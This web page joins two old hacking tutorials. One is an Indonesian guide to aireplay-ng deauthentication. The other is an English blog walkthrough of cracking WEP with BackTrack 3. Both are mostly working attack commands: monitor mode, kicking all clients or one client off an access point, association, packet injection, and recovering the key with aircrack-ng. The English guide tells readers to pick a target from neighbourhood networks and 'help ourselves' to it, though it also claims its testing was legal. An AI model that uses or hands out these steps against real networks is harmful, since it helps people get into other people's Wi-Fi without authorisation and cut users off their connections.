Hacking Wifi di backtrack 3

by fl3xu5 Published on 06-09-2009 11:06 AM Original author : budhye Di dalam backtrack terdapat tools aircrack untuk hacking wifi, dan aircrack ini memiliki sejumlah kawan di antaranya aireplay-ng, airodump-ng, airmon-ng dan lain sebagainya. Nah kali ini saya akan menjelaskan penggunaan dari aireplay-ng: a. Aktifkan device wireless menjadi mode monitor airmon-ng Penjelasan : airmon-ng : design wireless device menjadi mode monitor start,stop,check : [aktifkan, nonaktifkan, mengecek] wireless device berada di mode apa interface : device wireless Contoh : airmon-ng start wlan0 maka hasilnya : Interface Chipset Driver wlan0 Unknown iwlagn - [phy0] (monitor mode enabled on mon0) b. Mematikan seluruh client aireplay-ng - -deauth [count] -c FF:FF:FF:FF:FF:FF -a [AP MAC] device_wifi Penjelasan : - -deauth : mematikan autentikasi station count : Jumlah / lama waktu mematikan autentikasi station, jika count yang di input sudah selesai maka seluruh client aktif kembali. Contoh : aireplay-ng - -deauth 10 -c FF:FF:FF:FF:FF:FF -a [AA:BB:CC D:EE:FF] mon0

c. Mematikan satu client aireplay-ng - -deauth [count] -c [MAC client] -a [AP MAC] device_wifi Penjelasan : - -deauth : mematikan autentikasi station count : Jumlah / lama waktu mematikan autentikasi station, jika count yang di input sudah selesai maka seluruh client aktif kembali. Contoh : aireplay-ng - -deauth 10 -c A1:B2:C3:AF F:A4 -a [AA:BB:CC D:EE:FF] mon0 Kadang perintah aireply diatas tidak bisa karena channel dari AP-nya tidak sama dengan channel device wireless, jadi ulangi perintah tersebut hingga channel AP sama dengan device wireless yang kita miliki.

I'mASuper.com
A super hero. With no powers. Or motivation. Cracking WEP with BackTrack 3 Step by Step instructions
October 6, 2008 Leave a comment Go to comments This tutorial will show you, in explanatory detail, how to Break or crack WEP encryption using a simple linux-based security suite titled BackTrack 3. You dont even need linux! A free, downloadable CD ISO image will do all the work for you! The steps outlined here have been tested for clarity in a controlled, legal home networking environment, and work great. What you need: 1. A Computer (laptop) with a CD-ROM Drive and a wireless adapter (Preferrably not USB) 2. The ability to burn ISO images to CD or DVDThe ability to burn ISO images to CD or DVD 3. A copy of BackTrack 3 Security Suite from Remote-exploit.org Brief Background: BackTrack 3 is a legal and mostly open-source security suite designed by security experts in the computer and software Industry. Its creation is intended as both an educational tool,

and as a toolbox for network adminstrators who wish to secure a private or corporate network, or used in testing a secured network. When searching for it, youll often see it titled as BackTrack3 or Backtrack 3. 3 is the version number, and will change with time. As Im sure youre now well aware, WEP is a first generation wireless encrpytion technology that was used to provide basic security to users utilizing 802.11 wireless on their portable computers or devices. It was soon found to be extremely vulnerable to hack attemptions, and has since been replaced by the much more robust WPA technologies.

Common Shortcut terminiology (Important): Throughout this post, Ill be referring to IDs, names, and addresses unique to your configuration. Look for these in italics and replace them with values youve collected throughout the tutorial. Although I will always show the # in front of the values, never include it in the actual command.

#SSID Target SSID (ex: linksys) #BSSID - Target BSSID (ex: 2D:3F:33:45:56:53) #Channel - Target Channel (ex: 8 ) #adapter Your adapter (ex: ath0 or eth1)

Step 1 Get BT3 and Burn the Image: Download Backtrack 3 from Remote-exploit.org. Youll need to download the bt3-final.iso image. You can also use the USB version, bt3final_usb.iso which includes some extra tools, but we wont be using them here. Burn the ISO images to a CD or DVD. You wont need to make any changes. I wont go into specifics of how to burn an ISO here. If you dont have the vaguest idea how to do this, then its highly likely that cracking WEP is definitely not for you. However for those of you know think you can figure it out on your own, I have used CDBurnerXP. Its open-source and simple to use, so thats good. Alternatively, you can image a thumbdrive with the ISO. Thatll be MUCH faster than the optical drive at any rate. Step 2 Boot BackTrack 3: Throw the Backtrack 3 disc into your laptop or desktop (I havent tested this on a desktop, but Im sure the steps are the same), set your BIOS to boot from your optical drive, and BOOT! Youll get a prompt asking how to boot into Backtrack 3. You should boot using the KDE method. If you have weird display issues, you can try the VESA boot method. At any rate, one of these should work. Once youve become an elite hackmaster, and have memorized this process, you can use the command console.

Step 3 Obtain your target: Now is were we get to the fun part. We need to know which router, or Access Point, we intend on attacking. First were going to use KISMET. Kismet is graphic 802.11 locator. It will show detailed information about all the wireless networks and devices that are being picked up by your wireless router. To use kismet, head to your KDE Menu (Where a Windows Startmenu would be). Then navigate to: Backtrack 3 > Radio Network Analysis > 80211 > Analyser > Kismet Wireless Networks will begin to appear in Kismet as it begins to gather and analyze radio packets. These are all the wireless networks in your neighborhood or general area. You can see there is a wealth of information here. From this point, well need to use the keyboard, so get rid of your mouse. We need to sort our data, so while in the kismet window, hit the s key and then w for WEP. This will sort all of the wireless networks by their WEP encrpytion. Youll see everythng is reordered and sorted via the w column. Once youve determined your target, you can use your keyboard arrow keys to navigate to your target, and hit enter. Youll need some of the information on the new screen. You can write it down, or you can use kedit by going to IDE > Editors > Kedit. This works like Windows Notepad, so you can cut and past at your leisure. Youll ned the following information:

SSID BSSID Channel

The SSID is essentially the friendly wireless name you see all the time. the BSSID is the MAC address, or unique-hardware address of the AP or router. Exit Kismet with CNTRL-Q. Note the Capital Q. Step 4 Get system ready to record: Now the fun part. We need to get your computer ready to record all the radio packets you want to capture, so you can analyze them later. Down by the KDE start menu, youll see a little Black Monitor which will bring up a command console. Well be using these a lot, so just remember where it is.

Launch a new command window and enter the following: airmon-ng This will tell us how many adapters we have running. Stop everything that is running: airmon-ng stop #adapter Repeat the above command for every adapter listed from the airmon-ng command. Now we have no running adapters, or virtual adapters. essentially, anything Kismet started to capture radio packets has been turned off. On some laptops the above steps were absolutely essential, on other laptops, not so much. Start your adapter, capture only the channel that your target AP is broadcast on. We got this information above: airmon-ng start #adapter #channel run airmon-ng one more time to see what your new adapter is named. Youll want to keep this in mind as your adapter from here on out. Step 5 Recording packets: Were going to be gathering radio packets from you target router (AP) but we havent started recording them yet. Obviously if we dont record, we wont be able to analyze them, so lets start recording them now: airodump-ng adapter -w /hackme channel #channel ivs Weve now begun recording all data packets on your channel and started writing them to a hackme file located in the linux root, or /. For those of you really curious, the ivs tells it to record only authentication data packets, which is the heart of WEP exploitation. Leave this recording in this console Window. it will remain open for the remainder of this insane adventure. Step 6 AP assocation: Now that were recording data, we need to do kind of a handshake with your target WEP router. You see, when WEP computers and routers talk to one another, they initation their conversation with a little handshake or hello. this comes before authentication ever happens. If you try to do some authentication (step 7) without this hello, your target AP will simply ignore the authentication, because, like most people, theres no sense in talking to some jerk who wont even say hello.

To associate your laptop with your access point, run the following command: aireplay-ng -1 0 -e ssid -a #bssid #adapter This is absolutely critical. Your return should try a couple of authentication requests, and then return Assocation successful . If it does not, youre not going to be able to do packet injection (step 7). If you dont get a friendly return, you can try this: aireplay-ng test If you get a return indicating that Packet Injection should be possible, try another AP. You can also try getting physically closer to your target. Assocation and injection are difficult from distances, and may not work at all. I wont go into deep troubleshooting of assocation at this point. If for some terrible reason, your computer is not capable of assocation, dont fret. You wont be able to do packet injection though. Which means the process of collecting packets will take MUCH longer. Skip step 7 & 8 if you cant associate, but be advised it will likely take you hours if not days to collect enough packets to crack WEP. Thats why injection is so useful. Once youve associated successfully, continue on to the next step! Step 7 Packet Injection: In step 6, we said hello to the AP. The target AP or router is now aware of us. It knows we exist, and wont be surprised when we try to shake hands and authenticate with the network (Send a WEP key, authenticate, and get online to surf the web). This is where a major exploit becomes possible. With every IVS packet we receive (The packets sent from the AP when we try to authenticate) we become closer to cracking WEP. The best way to get hundreds of thousands of packets, is to repeatedly try to authenticate with the AP or router. This process is knowing as packet injection. Were injecting authentication packets repeatedly into the target AP, and forcing it to send us data back telling us OMG! Youre sending me the wrong AUTH DATA! NOOB!. Whats funny about it, is that with every wrong WEP Key. Try again! message it sends, were getting closer to the packets needed to mathetmically break down WEP and help ourselves to the target AP. To begin injection, do this (You can reuse the window created in step 6 if Authentication was successful): aireplay-ng -3 -b #bssid #adapter

This will send thousands of fake authentication requests. This process doesnt end, and will continue to send until youve manually stopped it using CNTRL-C or close the window. Keep in mind, there is no reason to stop it until weve received the WEP key. Youll see your IVS packet count going higher and higher, likely incredibly quickly. Meaning, hundreds every few minutes. After youve collected between 300,000 (300k) and 500,000 (500k) IVS data packets, you can move on to the next step. If youre not collecting IVS packets, you can open a new command console and rerun step 6 while step 7 is still running in another window. If you do this, youll notice that your ARP packet count begins to go up with every connection attempt in the other window. If you cant collect IVS packets, youll never get a WEP key. If your IVS count isnt going up, your whole process is hosed. Figure out where the kink is, and try again. Step 8 Breaking the WEP key: Okay, youve made it! Youve collected at least 300k IVS keys. If you havent, but you have at least 100, you can try this step anyway. Itll be fun. Now that we have all this recorded IVS packet information, we can crack the WEP key in a matter of moments. Run this command: aircrack-ng -s /hackme-01.ivs Now select the number that corrresponds to your target Access Point, or ssid. The screen will flash with a bunch of crazy, matrix looking numbers, and in 5 seconds or less will actually give you your Broken WEP key. If it doesnt return a WEP practically immediately, just exit (CNTRL-C) and wait a few more minutes. Eventually, youll have enough iVS packets to break the WEP key in literally just a few seconds. Congratulations! Youre done! I was one of the poor saps who couldnt associate, or do packet injection. Do I still have a chance? Yes! IVS packets are the whole key to successfully using airecrack to break a WEP key. If your attempts at packet injection have failed, or you cant associate (which forces injection to fail by default) then obviously, it becomes much harder to crack WEP. But you can still do it. Just record (Step 5) IVS information until youve built up enough packets by watching OTHER computers connecting to the AP. The more legitimate devices connecting to the AP, the better chance you have at getting enough IVS data without

waiting for a lifetime. If your AP has 2 or 3 laptops connecting to it every few hours, you can leave your computer capturing IVS information for a couple of days, and still break the WEP key using Step 8. Why cant I crack WEP in Windows? Ive looked everywhere, and there just isnt a tutorial! You can thank most Windows Hardware Vendors for that. The ability to snoop IVS packets comes from a wireless cards ability to enter Promiscious mode, Monitor mode, or rfmon mode. This allows a wireless card to captures all data packets, headers and all. Unfortunately, most windows drivers, with the exception of a few custom hardware solutions (AirPcap), dont allow you to put your wireless card into this kind of mode. Its not necessarily intentional. The likely explanation is that they simply didnt realize Windows users would like this functionality. Heaven forbid someone desire to use Windows hardware for something other than it was intended for. So the linux community, like in many situations, simply wrote custom drivers to work with hardware, and put it into promiscuous mode. No one has yet done this with Windows. There are some, very limited wireless cards out there that will go into rfmon mode without much effort, but my friend, I have to tell you, you probably dont have one of those cards. So for now, just continue to boot off of BackTrack 3 and have it do all the work for you!